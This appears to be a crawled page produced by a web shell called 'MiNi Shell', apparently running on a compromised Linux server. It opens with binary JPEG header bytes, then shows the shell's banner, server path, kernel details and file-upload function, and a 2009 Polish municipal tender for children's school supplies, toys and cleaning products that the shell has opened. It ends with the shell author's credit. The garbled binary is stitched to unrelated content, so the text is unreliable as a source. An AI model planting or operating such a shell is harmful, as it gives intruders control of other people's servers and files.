JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091005/344528-N-2009.html

<p class="kh_header"><b>Boguty: Dostawa dla Gminy Boguty-Pianki artykułów szkolnych i biurowych oraz środków czystości na potrzeby projektu  Wyrównywanie szans edukacyjnych dzieci w wieku 3-5 lat w Gminie Boguty-Pianki w latach 2008-2010  nr POKL.09.01.01-14-098/08 do siedziby Zamawiającego.</b><br>
<b>Numer ogłoszenia: 344528 - 2009; data zamieszczenia: 05.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Boguty-Pianki , Aleja Papieża Jana Pawła II 45, 07-325 Boguty, woj. mazowieckie, tel. 086 2775003, faks 086 275003.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> boguty-pianki.ornet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa dla Gminy Boguty-Pianki artykułów szkolnych i biurowych oraz środków czystości na potrzeby projektu  Wyrównywanie szans edukacyjnych dzieci w wieku 3-5 lat w Gminie Boguty-Pianki w latach 2008-2010  nr POKL.09.01.01-14-098/08 do siedziby Zamawiającego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa dla Gminy Boguty-Pianki radiomagnetofonów zabawek artykułów szkolnych i biurowych oraz środków czystości do  siedziby Zamawiającego.
Wraz z dostawa opisaną powyżej sprzętu Wykonawca powinien dostarczyć certyfikaty bezpieczeństwa 
Zamawiający dopuszcza oferty równoważne od podanej poniżej specyfikacji z zastrzeżeniem, że Wykonawca zapewni ich równoważność.
Wielkośc i zakres zamówienia:
1 część
Radiomagnetofon szt. 5; Płyty CD z muzyką i utworami słowno muzycznymi lub muzycznymi dla dzieci w wieku 3-5 lat - 5 zestawów po 70 utworów; 
2 część
Puzle dla dzieci  z około 25-30 elementów szt. 5, Samochód wywrotka szt. 10, Ciężarówka ze zwierzątkami szt. 10, Zestaw narzędzi zabawki walizka z co
 najmniej 7 narzędziami 5 zestawów, Drewniany samochodzik, Bujaki (zwierzaki)dla dzieci szt. 5, 
3 część
Mydełko toaletowe  dla dzieci w płynie z dozownikiem  500 ml szt 50, Papier toaletowy rolka średnicy co najmniej 10 cm szt. 150, Płyn do mycia urządzeń sanitarnych 1 l szt.25,  Płyn do mycia okien 1 litr szt. 5, Płyn do mycia naczyń 1 litr szt. 6, Płyn do mycia podłóg 1 litr szt. 10, Ręczniki papierowe szt. 500, 
4 część       
Papier kolorowy format A3 co najmniej 100 gramowy ryza 500 szt - 5 ryz, Kredki ołówkowe zestaw co najmniej 10 szt dł min 15 cm szt. 12, Kredki woskowe zestaw co najmniej 10 szt- 12 zestawów, Kredki akwarelowe zestaw co najmniej 10 szt - 12 zestawów, Farby plakatowe zestaw  co najmniej 12 kolorów  po 200 ml każdego koloru 5 zestawów, Plastelina min 6 kolorów po co najmniej 50 gram 1 koloru - 18 zestawów, Modelina min 6 kolorów po co najmniej 50 gram 1 koloru -18 zestawów, Ciastolina  min 6 kolorów po 120 g - 18 zestawów, Bloki techniczne format A 4 biały 20 kartkowy arkusz 160 gram- szt. 40, Papier wycinankowy samoprzylepny
 A 4  po 10 kolorów zestaw- 40 zestawów, Klej do papieru w sztyfcie  po min.
15 gram szt.72, Markery do białych tablic  koloru czarnego, czerwonego zielonego i niebieskiego  suchościeralne zestaw- 20 zestawów, Magnesy do tablic 10 kolorowych szt w zestawie-12 zestawów, Bloki techniczne kolorowe format A 4 
100 gram 20 kartek szt.5, Węgiel rysunkowy 10 pałeczek średnicy co najmniej 7,0 mm- 10 zestawów, Mazaki grube  9 kolorów w zestawie- 5 zestawów, Papier xero A4 ryza 80 gramowy-5 ryz, Szary duży papier 100x120cm szt. 500, Kolorowa bibuła zestaw 5 kolorów- 5 zestawów, Tablica  korkowa wymiary 100x150cm szt.5, Masa mocująca -5 opakowań, Kalka techniczna A4 ryza - ryz..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 37.00.00.00-8, 32.34.42.00-8, 32.35.31.00-3, 37.52.30.00-0, 37.52.72.00-0, 33.76.00.00-5, 33.76.30.00-6, 33.76.10.00-2, 39.83.17.00-3, 39.80.00.00-0, 39.83.20.00-3, 39.83.13.00-9, 39.83.17.00-3, 33.71.19.00-6, 30.19.76.44-2, 31.63.00.00-1, 37.82.21.00-7, 37.82.22.00-8, 37.82.32.00-5, 30.19.76.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają następujące warunki:
posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień;
posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia;
znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Zamawiający dokona oceny spełniania warunków na podstawie złożonego oświadczenia i dokumentów opisanych w SIWZ , wg form: spełnia, nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunk6w udziału w postępowaniu Wykonawcy musza dostarczyć:
Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu wg załączonego wzoru określonego w SIWZ 
Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www. boguty-pianki.ornet.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Boguty-Pianki
ul. Aleja Papieża Jana Pawła II 45
07-325 Boguty-Pianki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2009 godzina 10:00, miejsce: W siedzibie Zamawiającego w Urzędzie Gminy Boguty-Pianki ul. Aleja Papieża Jana Pawła II 45 Sekretariat- pok. 107.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany ze środków POKL 9.1.1.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Radiomagnetofony i płyty.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Radiomagnetofony szt 5, płyty 5 zestawów zawierające  co najmniej 70 utworów w zestawie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.34.42.10-1, 30.23.73.80-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zabawki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Puzle dla dzieci  z około 25-30 elementów -5 szt
Samochód wywrotka wymiar minimalny 
Długość 30 cm szerokość 15 cm wysokość 20 cm -10 szt
Ciężarówka ze zwierzątkami wymiar minimalny 
Długość 30 cm szerokość 15 cm wysokość 20 cm oraz 5 lub więcej zwierzątek- 10 szt.

Zestaw narzędzi zabawki walizka z co
 najmniej 7 narzędziami-5 zestawów
Drewniany samochodzik wymiar minimalny 
Długość 30 cm szerokość 15 cm wysokość 20 cm - 5 szt
Bujaki (zwierzaki)dla dzieci długość  70-100 cm szerokość 30 cm wysokość48-60 cm- 5 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.52.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Środki czystości i artykuły higieniczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mydełko toaletowe  dla dzieci w płynie z dozownikiem  500 ml  szt 50
Papier toaletowy rolka średnicy co najmniej 10 cm  szt 150
Płyn do mycia urządzeń sanitarnych 1 l  szt 25
Płyn do mycia okien 1 litr szt 5
Płyn do mycia naczyń 1 litr szt 6
Płyn do mycia podłóg 1 litr szt 10
Ręczniki papierowe szt. 500.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.70.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Artykuły szkolne i biurowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Papier kolorowy format A3 co najmniej 100 gramowy ryza 500 szt	5rys
Kredki ołówkowe zestaw co najmniej 10 szt dł min 15 cm	12 zestawów
Kredki woskowe zestaw co najmniej 10 szt	12 zestawów
Kredki akwarelowe zestaw co najmniej 10 szt	12 zestawów
Farby plakatowe zestaw  co najmniej 12 kolorów  po 200 ml każdego koloru	5 zestawów
Plastelina min 6 kolorów po co najmniej 50 gram 1 koloru	18 zestawów
Modelina min 6 kolorów po co najmniej 50 gram 1 koloru	18 zestawów
Ciastolina  min 6 kolorów po 120 g	18 zestawów
Bloki techniczne format A 4 biały 20 kartkowy arkusz 160 gram	40 szt.
Papier wycinankowy samoprzylepny
 A 4  po 10 kolorów zestaw	40 zestawów
Klej do papieru w sztyfcie  po min.
15 gram	72 szt.
Markery do białych tablic  koloru czarnego, czerwonego zielonego i niebieskiego  suchościeralne zestaw	20 zestawów
Magnesy do tablic 10 kolorowych szt w zestawie	12 zestawów
Bloki techniczne kolorowe format A 4 
100 gram 20 kartek	5szt.
Węgiel rysunkowy 10 pałeczek śr co najmniej 7,0 mm   10	zestawów
Mazaki grube  9 kolorów w zestawie	5 zestawów
Papier xero A4 ryza 80 gramowy	5 ryz
Szary duży papier 100x120cm	500 szt.
Kolorowa bibuła zestaw 5 kolorów	5 zestawów
Tablica wymiary 100x150cm	5 szt
Masa mocująca 	5 opakowań
Kalka techniczna A4 ryza	5 ryz.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com